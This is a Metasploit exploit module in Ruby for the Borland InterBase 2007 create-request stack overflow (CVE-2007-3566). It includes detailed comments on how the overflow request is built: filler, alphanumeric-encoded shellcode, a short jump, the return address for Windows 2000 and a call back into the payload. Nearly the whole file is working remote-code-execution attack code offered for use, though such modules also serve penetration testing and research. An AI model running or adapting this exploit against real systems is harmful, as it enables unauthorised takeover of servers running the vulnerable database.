##
# $Id: borland_interbase.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# Borland InterBase 2007 create-request stack overflow (CVE-2007-3566,
# OSVDB 38602, TPTI-07-13).
#
# A single oversized create-request sent to the InterBase listener
# (TCP/3050 by default) overruns a stack buffer. The only target in the
# table is Windows 2000 English with an address taken from
# sanctuarylib.dll, so this module is tied to that one build; the
# 'Offset' / 'Ret' pair would have to be re-derived for anything else.
class Metasploit3 < Msf::Exploit::Remote

  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata. Points a practitioner should know before touching
  # the numbers here:
  #
  #   * 'Space' => 850 is hand-synchronised with the `call -850` emitted in
  #     #exploit; changing one without the other breaks the jump back into
  #     the payload.
  #   * 'PrependEncoder' is `add esp, 0xffffefff` followed by `inc esp`,
  #     i.e. esp is moved 0x1000 bytes down before the decoder runs so the
  #     decoder's own stack writes cannot land on the encoded payload.
  #   * The encoder is pinned to AlphanumUpper and every filler byte is
  #     upper-case alpha; this suggests the vulnerable path only tolerates
  #     printable upper-case data, although BadChars lists just "\x00".
  #     Confirm against the target before relaxing either choice.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Borland Interbase Create-Request Buffer Overflow',
      'Description'    => %q{
This module exploits a stack buffer overflow in Borland Interbase 2007.
By sending a specially crafted create-request packet, a remote
attacker may be able to execute arbitrary code.},
      'Author'         => 'MC',
      'Version'        => '$Revision: 9525 $',
      'References'     =>
        [
          ['CVE', '2007-3566'],
          ['OSVDB', '38602'],
          ['URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-13'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'          => 850,
          'BadChars'       => "\x00",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
          'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Ret lives in sanctuarylib.dll; the module does not record what
          # instruction sits there.
          ['Windows 2000 English All / Borland InterBase 2007', { 'Offset' => 1266, 'Ret' => 0x1002e556 }],
        ],
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 24 2007'))

    register_options([Opt::RPORT(3050)], self.class)
  end

  # Connect, send one crafted create-request and hand the socket to the
  # payload handler.
  #
  # Wire layout of the request that is written in a single put():
  #
  #   header     two big-endian 32-bit words, 0x14 and 0x13. 0x14 matches
  #              the create operation the module title names; what the
  #              second word means is not recorded here.
  #   lead       Offset (1266) bytes of upper-case filler up to the
  #              overwritten slot.
  #   shellcode  payload.encoded, sized by 'Space' => 850.
  #   hop        `jmp short +6` plus 2 junk bytes: the jump skips the junk
  #              and the 4-byte Ret that follow, landing on `back`.
  #   ret        target.ret, little-endian.
  #   back       `call -850`: the 5-byte call whose displacement reaches
  #              back to the start of the 850-byte payload region.
  #   tail       40000 bytes of filler. Its purpose is not stated in the
  #              module; presumably it drives the overrun far enough for
  #              the overwritten slot to be used. Do not shrink it without
  #              re-testing.
  #
  # NOTE(review): the jmp-short / junk / Ret / call arrangement is the
  # classic shape of an SEH-record overwrite (next-SEH = short jump,
  # handler = Ret, with Ret being a pop/pop/ret). Nothing in this file
  # confirms that, so treat it as an assumption when re-deriving Offset
  # or Ret.
  #
  # Because the displacement in `back` is a literal, it must be kept equal
  # to the 'Payload' 'Space' value declared in #initialize.
  def exploit
    connect

    header    = [0x14, 0x13].pack('NN')
    lead      = rand_text_alpha_upper(target['Offset'])
    shellcode = payload.encoded
    hop       = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)
    ret       = [target.ret].pack('V')
    back      = [0xe8, -850].pack('CV')
    tail      = rand_text_alpha_upper(40000)

    request = header + lead + shellcode + hop + ret + back + tail

    print_status("Trying target #{target.name}...")
    sock.put(request)

    handler
    disconnect
  end
end